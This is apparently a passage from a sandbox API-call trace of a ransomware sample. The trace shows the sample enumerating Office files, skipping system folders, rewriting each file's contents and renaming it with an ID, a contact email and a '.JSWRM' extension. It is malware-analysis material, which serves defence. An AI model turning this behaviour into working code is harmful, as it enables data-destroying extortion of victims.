hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0119.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0119.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0119.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0119.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0119.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0119.839] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR6F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir6f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR6F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir6f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0119.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0119.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0119.841] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadd780c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadd780c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadd780c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6054, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR7B.GIF", cAlternateFileName="")) returned 1 [0119.841] lstrcmpiW (lpString1="PDIR7B.GIF", lpString2=".") returned 1 [0119.841] lstrcmpiW (lpString1="PDIR7B.GIF", lpString2="..") returned 1 [0119.841] lstrcmpiW (lpString1="PDIR7B.GIF", lpString2="...") returned 1 [0119.841] lstrcmpiW (lpString1="PDIR7B.GIF", lpString2="windows") returned -1 [0119.841] lstrcmpiW (lpString1="PDIR7B.GIF", lpString2="recovery") returned -1 [0119.841] lstrcmpiW (lpString1="PDIR7B.GIF", lpString2="perflogs") returned -1 [0119.841] lstrcmpiW (lpString1="PDIR7B.GIF", lpString2="documents and settings") returned 1 [0119.841] lstrcmpiW (lpString1="PDIR7B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.841] lstrcmpiW (lpString1="PDIR7B.GIF", lpString2="system volume information") returned -1 [0119.841] lstrcmpiW (lpString1="PDIR7B.GIF", lpString2="msocache") returned 1 [0119.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0119.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR7B.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR7B.GIF", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR7B.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0119.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0119.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR7B.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR7B.GIF", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR7B.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0119.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0119.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0119.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0119.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR7B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir7b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.842] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=24660) returned 1 [0119.842] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6050) returned 0x24e1d8 [0119.842] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x6050, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x6050, lpOverlapped=0x0) returned 1 [0119.845] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.845] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x6050, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x6050, lpOverlapped=0x0) returned 1 [0119.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.845] CloseHandle (hObject=0x314) returned 1 [0119.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0119.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0119.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0119.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0119.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0119.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0119.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0119.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0119.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0119.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0119.846] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR7B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir7b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR7B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir7b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0119.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0119.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0119.846] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadb15e3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadb15e3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadd780c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x70bc, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR7F.GIF", cAlternateFileName="")) returned 1 [0119.846] lstrcmpiW (lpString1="PDIR7F.GIF", lpString2=".") returned 1 [0119.846] lstrcmpiW (lpString1="PDIR7F.GIF", lpString2="..") returned 1 [0119.846] lstrcmpiW (lpString1="PDIR7F.GIF", lpString2="...") returned 1 [0119.847] lstrcmpiW (lpString1="PDIR7F.GIF", lpString2="windows") returned -1 [0119.847] lstrcmpiW (lpString1="PDIR7F.GIF", lpString2="recovery") returned -1 [0119.847] lstrcmpiW (lpString1="PDIR7F.GIF", lpString2="perflogs") returned -1 [0119.847] lstrcmpiW (lpString1="PDIR7F.GIF", lpString2="documents and settings") returned 1 [0119.847] lstrcmpiW (lpString1="PDIR7F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.847] lstrcmpiW (lpString1="PDIR7F.GIF", lpString2="system volume information") returned -1 [0119.847] lstrcmpiW (lpString1="PDIR7F.GIF", lpString2="msocache") returned 1 [0119.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0119.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR7F.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR7F.GIF", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR7F.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0119.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0119.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR7F.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR7F.GIF", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR7F.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0119.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0119.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0119.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0119.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR7F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir7f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.848] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=28860) returned 1 [0119.848] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70b0) returned 0x24e1d8 [0119.848] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x70b0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x70b0, lpOverlapped=0x0) returned 1 [0119.851] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.851] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x70b0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x70b0, lpOverlapped=0x0) returned 1 [0119.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.852] CloseHandle (hObject=0x314) returned 1 [0119.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0119.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0119.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0119.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0119.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0119.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0119.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.852] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR7F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir7f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR7F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir7f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0119.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0119.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0119.853] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadb15e3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadb15e3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadd780c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd2e, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR8B.GIF", cAlternateFileName="")) returned 1 [0119.853] lstrcmpiW (lpString1="PDIR8B.GIF", lpString2=".") returned 1 [0119.853] lstrcmpiW (lpString1="PDIR8B.GIF", lpString2="..") returned 1 [0119.853] lstrcmpiW (lpString1="PDIR8B.GIF", lpString2="...") returned 1 [0119.853] lstrcmpiW (lpString1="PDIR8B.GIF", lpString2="windows") returned -1 [0119.853] lstrcmpiW (lpString1="PDIR8B.GIF", lpString2="recovery") returned -1 [0119.853] lstrcmpiW (lpString1="PDIR8B.GIF", lpString2="perflogs") returned -1 [0119.853] lstrcmpiW (lpString1="PDIR8B.GIF", lpString2="documents and settings") returned 1 [0119.853] lstrcmpiW (lpString1="PDIR8B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.853] lstrcmpiW (lpString1="PDIR8B.GIF", lpString2="system volume information") returned -1 [0119.853] lstrcmpiW (lpString1="PDIR8B.GIF", lpString2="msocache") returned 1 [0119.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0119.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR8B.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR8B.GIF", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR8B.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0119.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0119.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR8B.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR8B.GIF", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR8B.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0119.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0119.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0119.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0119.854] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR8B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir8b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.854] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=3374) returned 1 [0119.854] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd20) returned 0x24e1d8 [0119.855] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xd20, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0xd20, lpOverlapped=0x0) returned 1 [0119.900] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.900] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0xd20, lpOverlapped=0x0) returned 1 [0119.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.900] CloseHandle (hObject=0x314) returned 1 [0119.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0119.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0119.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0119.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0119.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0119.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0119.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0119.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0119.901] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR8B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir8b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR8B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir8b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0119.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: 